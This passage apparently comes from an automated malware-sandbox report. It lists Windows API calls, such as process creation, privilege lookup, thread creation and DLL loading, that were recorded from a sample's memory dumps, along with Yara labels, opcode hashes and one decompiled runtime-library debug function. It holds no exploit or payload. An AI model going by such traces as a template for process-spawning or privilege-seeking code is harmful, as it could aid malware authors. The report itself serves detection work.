                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 028372CA
                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 028372EB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID:
                                                                                          • API String ID: 1836367815-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInternalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2186235152-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02839BA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInternalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2186235152-0
                                                                                          • Opcode ID: e5bc2c8163dfd035f233500bc4259d589e48899183c3e29740ceb04ff21dffe2
                                                                                          • Instruction ID: cd87c3ac18595ef37374820131eaaa64d492856440f9505c8301625410b00c1c
                                                                                          • Opcode Fuzzy Hash: e5bc2c8163dfd035f233500bc4259d589e48899183c3e29740ceb04ff21dffe2
                                                                                          • Instruction Fuzzy Hash: A601A8B6210108AFCB54DF99DC80EEB37A9AF9C354F158258FA1DD7290D630E851CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 028485A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateInternalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2186235152-0
                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                          • Instruction ID: afe243bbe584691729f0f348fb0d57f9325d156419cc8642213d5d927760a6a2
                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                          • Instruction Fuzzy Hash: 2B01AFB6210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0283CCE0,?,?), ref: 0284705C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                                                                          • Instruction ID: 30536b5d635fafdba2a8059ab78065bd7f174b690503efdb5a3e56bb5c69980b
                                                                                          • Opcode Fuzzy Hash: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                                                                          • Instruction Fuzzy Hash: 3BE06D3B3912083BE330659DAC02FA7B29D8B95B20F150026FA0DEA2C1D995F80146A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 8ae5c8d622228d7db615485e686c79bb0943a2fae952be9df479586ba2e52c5b
                                                                                          • Instruction ID: 7f78a253cf086805fe90e566e3c7ce05be0f1bf25093e9a11d5dfdad0da8fbe5
                                                                                          • Opcode Fuzzy Hash: 8ae5c8d622228d7db615485e686c79bb0943a2fae952be9df479586ba2e52c5b
                                                                                          • Instruction Fuzzy Hash: DAF0E5752002086FCB10DF94DC41FEB37A9DF86360F108158FD4897241C570E8118BE1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                          • Instruction ID: 81ea0221c7c0da54f497a0bcbabc66ad6df70af182f61bc04496903dc7f01ded
                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                          • Instruction Fuzzy Hash: 57E01AB52002086BDB10EF49DC84EE737ADAF88650F018154BA0857241C930F8108BF5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(02843526,?,02843C9F,02843C9F,?,02843526,?,?,?,?,?,00000000,00000000,?), ref: 028484CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                          • Instruction ID: ec63635f52e2693bbeec7ff95f537ba8d0e34db8993f8add605f515a1ad2b42b
                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                          • Instruction Fuzzy Hash: 6BE046B5200208ABDB14EF99DC40EA777ADEF88750F118558FE089B241CA30F910CBF0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02837C73,?), ref: 0283D44B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: c031e9279cf636f97e204e0d6bdcd9aad10003145f2854817b3fe5084e567cb3
                                                                                          • Instruction ID: 1be11058b2186a75f24c2b3ca20fb1158030aca47cf1353114c42dc8a5398ddf
                                                                                          • Opcode Fuzzy Hash: c031e9279cf636f97e204e0d6bdcd9aad10003145f2854817b3fe5084e567cb3
                                                                                          • Instruction Fuzzy Hash: E2D05EBE7402442AE620EBB49C12FA627959B65714F0940B4F58DD62C3DA54D1018521
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02837C73,?), ref: 0283D44B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorMode
                                                                                          • String ID:
                                                                                          • API String ID: 2340568224-0
                                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                          • Instruction ID: c718d18164e7e6644043e2ac2ec9218d9fc4e3716c0ef2ec44448751587dddca
                                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                          • Instruction Fuzzy Hash: 37D0A7797503083BE610FAA89C03F2672CD5B54B14F494074F94CD73C3DE54F4004562
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0283CFB2,0283CFB2,?,00000000,?,?), ref: 02848670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.909733720.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LookupPrivilegeValue
                                                                                          • String ID:
                                                                                          • API String ID: 3899507212-0
                                                                                          • Opcode ID: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
                                                                                          • Instruction ID: 918005ec7daba52e7547c96dfb64b794448696b03022062bc95b87bf9dca5cb1
                                                                                          • Opcode Fuzzy Hash: 6f536b0b01077d86152a2a3cf023b86940099eef3e14c1d7fc89a8486a09fe24
                                                                                          • Instruction Fuzzy Hash: 3EC08CBE64051C9FC660FA95E808AA7B39A9E85311320865AD85C626109A3289AA45A0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 396b5a6c2c06baaa4d1740f273b91553f3381250fb6a11eb1199996145e462b6
                                                                                          • Instruction ID: db1ffb1c9c7ba4f3123512f0617f6336619d1d092c99e3680306c8dc173987a1
                                                                                          • Opcode Fuzzy Hash: 396b5a6c2c06baaa4d1740f273b91553f3381250fb6a11eb1199996145e462b6
                                                                                          • Instruction Fuzzy Hash: 26B092B29024C5DAEB11E7A54A18B2B7A01BBD4741F66C066E20206A1A4B78C8D1F6B6
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          C-Code - Quality: 53%
                                                                                          			E02DEFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                          				void* _t7;
                                                                                          				intOrPtr _t9;
                                                                                          				intOrPtr _t10;
                                                                                          				intOrPtr* _t12;
                                                                                          				intOrPtr* _t13;
                                                                                          				intOrPtr _t14;
                                                                                          				intOrPtr* _t15;
                                                                                          
                                                                                          				_t13 = __edx;
                                                                                          				_push(_a4);
                                                                                          				_t14 =  *[fs:0x18];
                                                                                          				_t15 = _t12;
                                                                                          				_t7 = E02D9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                          				_push(_t13);
                                                                                          				E02DE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                          				_t9 =  *_t15;
                                                                                          				if(_t9 == 0xffffffff) {
                                                                                          					_t10 = 0;
                                                                                          				} else {
                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                          				}
                                                                                          				_push(_t10);
                                                                                          				_push(_t15);
                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                          				return E02DE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                          			}











                                                                                          APIs
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02DEFDFA
                                                                                          Strings
                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02DEFE2B
                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02DEFE01
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.910088572.0000000002D30000.00000040.00000001.sdmp, Offset: 02D30000, based on PE: true
                                                                                          • Associated: 00000011.00000002.910294898.0000000002E4B000.00000040.00000001.sdmp
                                                                                          • Associated: 00000011.00000002.910305789.0000000002E4F000.00000040.00000001.sdmp
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                          • API String ID: 885266447-3903918235
                                                                                          • Opcode ID: 4a90d21d350a98751d25fdab66c8b221b1eca7c710ab573d76e0b653c7c37f84
                                                                                          • Instruction ID: e23ae2c1ab58486f1e39949384f30bf0e86e1a159e1ccca99b2e37495c567c9d
                                                                                          • Opcode Fuzzy Hash: 4a90d21d350a98751d25fdab66c8b221b1eca7c710ab573d76e0b653c7c37f84
                                                                                          • Instruction Fuzzy Hash: B1F0F676200201BFEA203A55EC06F23BB6BEB44B70F140315F629566D1DA62FC30CAF0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%